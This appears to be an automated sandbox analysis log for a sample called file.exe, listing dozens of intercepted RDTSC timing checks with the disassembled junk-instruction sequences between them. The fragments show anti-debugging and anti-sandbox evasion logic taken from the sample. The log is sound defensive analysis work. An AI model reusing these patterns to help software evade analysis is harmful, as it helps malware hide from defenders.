                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10836FE second address: 1083708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10839C8 second address: 10839F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FB4752107FAh 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FB475210801h 0x00000012 js 00007FB4752107F6h 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083B32 second address: 1083B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB475272196h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083B3C second address: 1083B60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB475210808h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10360D2 second address: 10360ED instructions: 0x00000000 rdtsc 0x00000002 js 00007FB475272198h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FB4752721A8h 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007FB475272196h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084B12 second address: 1084B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1084B16 second address: 1084B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752721A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10890EF second address: 108910A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB475210803h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EC2B second address: 108EC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4752721A1h 0x00000009 jmp 00007FB4752721A5h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FB4752721A5h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EC70 second address: 108ECA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB4752107FEh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnp 00007FB4752107F6h 0x00000014 js 00007FB4752107F6h 0x0000001a jmp 00007FB475210803h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108ECA7 second address: 108ECB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB475272196h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108EE1C second address: 108EE22 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F56E second address: 108F572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F572 second address: 108F58B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB475210803h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F58B second address: 108F5AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752721A4h 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FE02 second address: 108FE0E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB4752107F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FE0E second address: 108FE24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752721A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108FE24 second address: 108FE50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007FB4752107FAh 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB475210801h 0x0000001a jno 00007FB4752107F6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10900E6 second address: 10900F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FB47527219Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10900F3 second address: 1090122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB4752107FAh 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FB475210800h 0x00000015 popad 0x00000016 push esi 0x00000017 jns 00007FB4752107F6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090372 second address: 1090378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090922 second address: 109092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109092A second address: 1090932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEFFA2 second address: FEFFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB4752107F6h 0x0000000a pop eax 0x0000000b jns 00007FB475210809h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10990AD second address: 10990B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10990B3 second address: 10990BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10990BD second address: 10990DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB4752721A7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10990DE second address: 10990E8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4752107F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099749 second address: 1099751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099751 second address: 1099757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099757 second address: 109978C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB4752721A0h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FB4752721A5h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1099B9E second address: 1099BA8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4752107F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A26D3 second address: 10A26D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A26D9 second address: 10A26F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB475210805h 0x00000009 jns 00007FB4752107F6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0855 second address: 10A0864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB475272196h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0864 second address: 10A08A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB475210804h 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007FB4752107FEh 0x00000010 jmp 00007FB475210808h 0x00000015 pop edi 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0E92 second address: 10A0EA7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB475272196h 0x00000008 jng 00007FB475272196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0EA7 second address: 10A0EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB4752107F6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0EB2 second address: 10A0ED0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB4752721A4h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0ED0 second address: 10A0EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FB4752107FBh 0x0000000b jc 00007FB4752107F6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A119B second address: 10A11B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752721A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1307 second address: 10A1319 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB4752107F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FB4752107F6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1319 second address: 10A1321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A163C second address: 10A1640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1797 second address: 10A17A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A17A0 second address: 10A17A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A17A4 second address: 10A17B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB47527219Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A17B5 second address: 10A17BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A17BF second address: 10A17C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A17C3 second address: 10A17C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A1E9D second address: 10A1EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A2531 second address: 10A2535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8753 second address: 10A8758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8758 second address: 10A8769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FB4752107F6h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A88D4 second address: 10A88ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FB475272196h 0x00000009 jmp 00007FB47527219Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF5024 second address: FF502A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B7B3C second address: 10B7B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BA1B5 second address: 10BA1C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FB4752107F8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C1D38 second address: 10C1D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CB99E second address: 10CB9C7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 jne 00007FB4752107FEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB475210801h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D33FE second address: 10D341E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4752721A1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e ja 00007FB475272196h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D358A second address: 10D3590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3590 second address: 10D35AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB47527219Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D36EC second address: 10D3702 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4752107F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4752107FAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3702 second address: 10D370B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3886 second address: 10D388C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D388C second address: 10D3890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3890 second address: 10D3896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3896 second address: 10D389F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D389F second address: 10D38B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4752107FDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D39CF second address: 10D39F7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB475272196h 0x00000008 jmp 00007FB4752721A0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FB47527219Ch 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D39F7 second address: 10D3A01 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4752107FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3B5D second address: 10D3B69 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FB475272196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3D1D second address: 10D3D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3ECF second address: 10D3EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FB475272196h 0x0000000c popad 0x0000000d jbe 00007FB475272198h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D3EE4 second address: 10D3EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8462 second address: 10D8468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8114 second address: 10D8137 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB4752107F6h 0x00000008 jmp 00007FB475210809h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8137 second address: 10D8145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FB475272196h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB2E4 second address: 10DB2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE56A second address: 10DE570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE570 second address: 10DE57C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB4752107F6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E77FE second address: 10E7819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4752721A7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7819 second address: 10E7823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7823 second address: 10E7827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8EA0 second address: 10E8EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB4752107F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8EAC second address: 10E8EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FB475272196h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8EB9 second address: 10E8EC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752107FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8EC8 second address: 10E8EE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB4752721A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8EE3 second address: 10E8F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FB4752107FAh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jns 00007FB4752107FEh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EE082 second address: 10EE0DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB4752721A5h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007FB475272196h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FB4752721A6h 0x00000022 jmp 00007FB4752721A8h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EE0DD second address: 10EE103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 js 00007FB4752107F6h 0x0000000f jmp 00007FB475210806h 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E571D second address: 10E5726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FBF57 second address: 10FBF76 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4752107F6h 0x00000008 jmp 00007FB475210801h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FBF76 second address: 10FBF7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FBF7A second address: 10FBF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
